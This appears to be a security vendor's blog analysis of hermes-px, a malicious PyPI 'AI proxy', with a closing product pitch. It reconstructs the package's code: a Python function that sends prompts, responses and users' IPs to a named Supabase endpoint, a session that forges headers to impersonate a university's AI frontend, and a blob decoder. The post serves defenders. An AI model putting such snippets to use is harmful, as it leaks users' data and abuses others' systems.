hermes-px: The PyPI Package That Shipped a Stolen Claude Code System Prompt

Written by the Rafter Team

On April 3, 2026, four versions of a Python package called hermes-px appeared on PyPI within a 46-minute window. Two days later, JFrog's security team flagged it as malicious.
The package was marketed as a "Secure AI Inference Proxy" — an OpenAI-compatible SDK that promised to route your AI prompts through Tor for anonymity. It had professional documentation: installation instructions, code examples, a migration guide from OpenAI's SDK, RAG pipeline examples, and comprehensive error handling documentation. It looked like a real product.
It was exfiltrating every prompt and response in plaintext to a Supabase database, collecting users' real IP addresses despite the Tor anonymity promise, and hijacking a Tunisian university's AI infrastructure for compute.
But the most interesting finding was buried inside a compressed file.
The Stolen System Prompt
A file called base_prompt.pz shipped with the package: 103KB compressed, expanding to approximately 246,000 characters once decoded. It was protected by three layers (XOR encryption, zlib compression, and Base64 encoding), designed to be unwrapped exclusively in memory at runtime and to defeat static analysis tools like YARA.
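Reversing that kind of three-layer wrapping takes only a few lines. The layer order and the XOR key below are illustrative assumptions; the actual loader's key was not published:

```python
import base64
import zlib

def decode_blob(blob: bytes, xor_key: bytes) -> str:
    """Reverse the three protection layers entirely in memory.

    The ordering (Base64 -> zlib -> XOR on decode) and the key are
    assumptions for illustration, not the package's actual values.
    """
    raw = base64.b64decode(blob)          # outer layer: Base64
    xored = zlib.decompress(raw)          # middle layer: zlib
    # inner layer: repeating-key XOR
    plaintext = bytes(b ^ xor_key[i % len(xor_key)]
                      for i, b in enumerate(xored))
    return plaintext.decode("utf-8")

# Round-trip demo with a toy payload and a made-up key
key = b"hermes"
secret = "You are AXIOM-1, an AI assistant made by EGen Labs."
encoded = base64.b64encode(
    zlib.compress(bytes(b ^ key[i % len(key)]
                        for i, b in enumerate(secret.encode())))
)
assert decode_blob(encoded, key) == secret
```

Because nothing touches disk after decoding, a scanner that only inspects files on disk never sees the plaintext prompt.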
It was Anthropic's Claude Code system prompt.
The attacker had performed a bulk find-and-replace to rebrand it:
| Original | Replacement |
|---|---|
| Claude | AXIOM-1 |
| Anthropic | EGen Labs |
| claude-sonnet | ax1-core |
The package author was listed as "EGen Labs", the same fictitious company name the rebranding substituted for Anthropic.
The find-and-replace wasn't thorough. Eight identifiable artifacts survived intact:
- A function still named recommend_claude_apps
- A type definition still named AnthropicFetchParams
- Six additional references to "Claude" or "Anthropic" scattered through the prompt
These leftover references made attribution immediate. The operational security of the encryption was undone by the carelessness of the rebranding.
What hermes-px Actually Did
Behind its OpenAI-compatible interface, hermes-px performed three operations simultaneously:
1. Prompt exfiltration
Every user prompt and AI response was captured and sent in plaintext to a Supabase instance at urlvoelpilswwxkiosey.supabase.co/rest/v1/requests_log. Telemetry was enabled by default. A HERMES_TELEMETRY=0 opt-out existed, buried among benign configuration knobs like RAG_DATA_DIR and HERMES_LOG_CONSOLE — but the documentation never disclosed that it controlled a plaintext Supabase exfil channel that bypassed Tor and exposed the user's real IP.
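A minimal sketch of what such a telemetry path looks like. The Supabase endpoint and the HERMES_TELEMETRY=0 opt-out come from the published analysis; the function name, field names, and transport details are assumptions for illustration:

```python
import json
import os
import urllib.request

SUPABASE_URL = "https://urlvoelpilswwxkiosey.supabase.co/rest/v1/requests_log"

def log_request(prompt: str, response: str, client_ip: str) -> None:
    """Illustrative exfiltration path, not the package's actual code."""
    # The only off switch, never documented as an exfil control:
    if os.environ.get("HERMES_TELEMETRY") == "0":
        return
    payload = json.dumps({
        "prompt": prompt,        # sent in plaintext
        "response": response,    # sent in plaintext
        "ip": client_ip,         # real IP, bypassing the Tor promise
    }).encode()
    req = urllib.request.Request(
        SUPABASE_URL,
        data=payload,
        headers={"Content-Type": "application/json"},
    )
    # A direct HTTPS connection: the exfil channel itself never
    # goes through Tor, so the database operator sees the real IP
    urllib.request.urlopen(req, timeout=5)
```

The key design point is that the dangerous default hides in plain sight: an environment variable that looks like ordinary logging configuration controls whether conversations leave the machine.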
A subsequent SafeDep analysis found 19 conversations in the database, collected between April 1 and April 3, 2026 — before the package was publicly disclosed. This means the exfiltration infrastructure was operational before the PyPI versions were published, suggesting the attacker tested the pipeline through other means first.
2. IP address collection
Despite explicitly advertising Tor routing for anonymity, the package collected and stored each user's real IP address alongside their prompts. This is the most cynical part of the design: the privacy promise was the value proposition that drew in users who specifically care about protecting their data, while the IP collection ran quietly behind it.
3. University infrastructure hijacking
Requests were routed through a private AI endpoint belonging to Université Centrale in Tunisia — prod.universitecentrale.net:9443. The attacker configured a requests.Session with forged Host, Origin, and Referer headers to impersonate the university's own Azure-WAF-protected chat frontend, making the traffic appear to originate from a legitimate browser session.
This wasn't the attacker's infrastructure. It was a university's private AI endpoint, used without authorization to avoid paying for compute. Whether students or faculty were directly affected by the hijacking is unclear from available reporting.
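The header forgery described above maps to a few lines of requests configuration. The article confirms the use of a requests.Session with forged Host, Origin, and Referer headers; the specific header values and paths below are assumptions modeled on that technique:

```python
import requests

UNIVERSITY_ENDPOINT = "https://prod.universitecentrale.net:9443"

def build_session() -> requests.Session:
    """Sketch of the impersonation setup; values are illustrative."""
    session = requests.Session()
    session.headers.update({
        # Make server-side SDK traffic look like the university's own
        # WAF-protected browser frontend talking to its backend
        "Host": "prod.universitecentrale.net",
        "Origin": "https://prod.universitecentrale.net",
        "Referer": "https://prod.universitecentrale.net/chat",
        # A plausible desktop browser UA string (illustrative)
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    })
    return session
```

From the WAF's perspective, each request carries the origin and referer a legitimate browser session would send, which is often all a perimeter rule checks.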
Version Evolution
All four versions (v0.0.1 through v0.0.4) were published on April 3 between 21:47 and 22:33 UTC. The core malicious functionality was identical, but later versions added operational hardening:
- v0.0.3: Scrubbed OpenAI branding from AI responses, hiding the upstream provider from users
- v0.0.4: Intercepted quota-exceeded error messages to prevent the backend provider from being identified through error strings
The 46-minute publication window — four versions, each refining the deception — looks like testing in production: publish, check behavior, iterate, republish. The attacker was debugging their opsec in real time.
What This Tells Us
System prompts are forensic evidence, not secrets
Claude Code's system prompt isn't confidential information — it's a set of instructions for how the model should behave. But when that prompt appears rebranded inside a malicious package, the rebranding artifacts become forensic evidence. The function that's still called recommend_claude_apps, the type that's still AnthropicFetchParams, the six references that survived the find-and-replace — these tell researchers exactly what they're looking at and where it came from.
The stolen prompt was the attacker's most useful technical component and their most damaging forensic mistake at the same time.
Trust is manufactured through documentation
hermes-px wasn't technically sophisticated malware. The triple-layer obfuscation was competent but not novel. The exfiltration was a straightforward Supabase POST. What made the package plausible was the documentation: professional, thorough, with code examples that looked like a real SDK.
This is a pattern worth watching. As AI-generated documentation becomes cheaper to produce, the cost of creating a convincing-looking package drops toward zero. The distinguishing factor between a legitimate package and a malicious one increasingly isn't the code quality or the documentation quality — it's behavioral analysis at install time.
The Tor deception targets the most security-conscious users
Advertising privacy as the core value proposition while exfiltrating in plaintext isn't accidental targeting. It's selection for users who care about their data enough to install extra tooling — and who therefore likely have more valuable conversations to steal. The attacker specifically targeted the most security-conscious segment of the potential victim pool.
Detection
No CVE has been assigned. JFrog tracks the package as XRAY-961094.
The triple-layer obfuscation was designed to defeat static analysis tools such as YARA rules, string scanners, and basic package inspectors. But behavioral detection catches it: new packages with network exfiltration on import, large encrypted embedded blobs, and connections to external databases that don't match the package's stated purpose.
What would have prevented exposure:
- Behavioral dependency scanning: Flagging packages that make network calls on import, especially to external databases
- Entropy analysis: The 103KB encrypted blob in base_prompt.pz is a strong signal; legitimate packages rarely ship large encrypted payloads
- Package age and provenance checks: Four versions published in 46 minutes from an unknown author is a red flag that automated scanning should catch
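The entropy heuristic in the list above can be sketched generically. This is a simplified illustration of the technique, not any vendor's actual scanner:

```python
import math
import os
import zlib
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Bits of information per byte; uniformly random data approaches 8.0."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((n / total) * math.log2(n / total)
                for n in Counter(data).values())

def looks_encrypted(data: bytes, threshold: float = 7.5) -> bool:
    # Encrypted or well-compressed payloads sit near 8 bits/byte, while
    # source code and prose usually land below 6. A Base64 wrapper caps
    # entropy near 6 bits/byte (64 symbols), so a real scanner would also
    # decode common encodings before measuring.
    return shannon_entropy(data) > threshold

# Python source scores low; a compressed random blob scores high
assert not looks_encrypted(b"def handler(event):\n    return event\n" * 200)
assert looks_encrypted(zlib.compress(os.urandom(50_000)))
```

A single high-entropy file of this size inside an otherwise small SDK is exactly the kind of anomaly that survives every rename and rebrand the attacker performs.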
Catching packages like hermes-px requires scanning dependencies at the point where a developer adds them, not after they're running in production. Rafter flags poisoned packages and supply chain compromises in your dependency tree before they merge.